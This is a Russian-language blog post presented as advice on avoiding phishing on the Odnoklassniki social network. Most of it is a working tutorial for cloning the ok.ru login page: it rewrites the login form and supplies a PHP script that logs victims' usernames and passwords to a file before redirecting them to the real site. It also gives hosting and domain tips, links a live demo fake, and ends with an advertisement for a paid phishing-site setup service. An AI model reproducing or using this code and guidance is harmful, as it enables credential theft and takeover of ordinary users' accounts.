Как не попасть на фишинг в одноклассниках

Привет. По многочисленным просьбам я решил написать статью о фишинге в одноклассниках. Я уже писал про фишинг в ВК и теперь пришло время одноклассников. И так я рассмотрю в этой статье, как создается данный фейк, чтобы вы могли понять как не попасться на уловку мошенников. Так же в конце статьи будет услуга по созданию фишиг сайта одноклассников за $, тем кому лень мотайте в низ. Погнали.

Что такое фишинговый сайт?

Это ложно-официальный сайт не принадлежащий официальной компании. Это может быть любой сайт не обязательно соц. сети, допустим таким сайтом может быть даже почтовый ящик на яндексе или гугле. На таких сайтах обычно вам нужно ввести логин и пароль, после чего вы теряете доступ к своей странице.

Как можно защититься от фишинга

Бытует мнение в народе, что вам поможет антивирус. Так вот это мнение в корне неверно, если фейк достаточно молодой, то его просто нет в базе антивируса и перейдя на такой сайт, ваш антивирус даже ничего не скажет. Самый действенный метод это смотреть на юрл адрес куда вы переходите и тем более быть край подозрительными там где вы вводите свой логи и пароль. Вот вам пример фейкового сайта в одноклассниках обратите внимание на адрес сайта.

Как видите, все картинки, форма логина и пароля, все совпадает с официальным сайтом одноклассников, но если вы введете логин и пароль, то их узнает злоумышленник. Попытайтесь ввести пароль и логи, затем нажмите кнопку войти, данные, которые вы ввели, вы можете посмотреть на этой странице.

Вводить можно любые символы. Свои настоящие данные не вводите иначе их узнают все посетители моего портала.

Что будет, если ввести свои данные на фишинговом сайте?

Вы потеряете доступ к своему аккаунту / странице. Возможно без возможности восстановления. Это зависит от множества параметров. Была ли привязана дополнительная почта, был ли привязан телефон, доступен ли сейчас этот телефон и еще куча параметров. У каждой соц. сети свои условия восстановления доступа.

Создание фишинг сайта одноклассники

Заходим на сам сайт ok.ru через любой браузер. Я использую браузер chrom. Нажимаю три точки в верхнем правом углу, после чего открывается контекстное меню и там выбираю — дополнительные инструменты. Затем выбираю первый пункт — сохранить страницу как.

После чего, в открывшемся окне выбираю куда сохранить и под каким именем, делайте все то же самое, как и у меня на скриншоте.

Теперь с помощью блокнота открываем файл «index.html», нажимаем комбинацию клавиш «ctrl+f» и ищем кусок кода:

<form method=”post” action=”https://www.ok.ru/https”

Меняем на:

<form method=”post” action=”icq.php”

Ниже ищем кусок кода:

<input type=”text” name=”st.email”

Меняем на:

<input type=”text” name=”1″

Еще ниже ищем кусок кода:

<input type=”password” name=”st.password”

И его меняем на:

<input type=”password” name=”2″

Теперь у нас на рабочем столе есть папка «index_files» и файл index.html. Создаем еще один файл с названием «icq.php», открываем его блокнотом и внутрь копируем этот код.

<?
$Login = $_POST[‘1’];
$Pass = $_POST[‘2′];
$log = fopen(“ups.html”,”a+”);
fwrite($log,”Логин =$Login <br> Пароль =$Pass <br>”);
fclose($log);
echo “<html><head><META HTTP-EQUIV=’Refresh’ content =’0; URL=http://ok.ru’></head></html>”;
?>

После чего все эти три файла нужно залить себе на хостинг. Этот хостинг дает возможность пользоваться им бесплатно целый месяц, вам вполне хватит времени на все тесты. Также вам там нужно будет придумать имя для бесплатного домена третьего уровня или купить домен второго уровня. Там если оплачиваешь хостинг, то домен второго уровня дается в подарок.

  1. Домен третьего уровня: warninf.27sysday.ru
  2. Домен второго уровня: 27sysday.ru

Рассказ о том как залить все это дело на хостинг

Друзья, пройдите опрос на тему какие еще фишинги можно сделать и нужны ли они у нас в группе: https://vk.com/27sysday

В связи с большим количеством обращений, решил создать услугу по настройке.

  1. Статья про фишинг в ВК.
  2. Вышла новая статья про фишинг в инстаграм.

Что понадобится

  1. Вам нужно зарегистрироваться https://beget.com
  2. Связать со мной в скайпе spbskull.
  3. Сказать мне логин и пароль.
  4. Пополнить баланс телефона на 1500 рублей (тел. скажу в скайпе).
  5. Через час после оплаты, получите готовое решение.
Помогла статья? Оцените её
Очень плохоПлохоСреднеХорошоОтлично (2 оценок, среднее: 5,00 из 5)
Загрузка...
Добавить комментарий

Вверх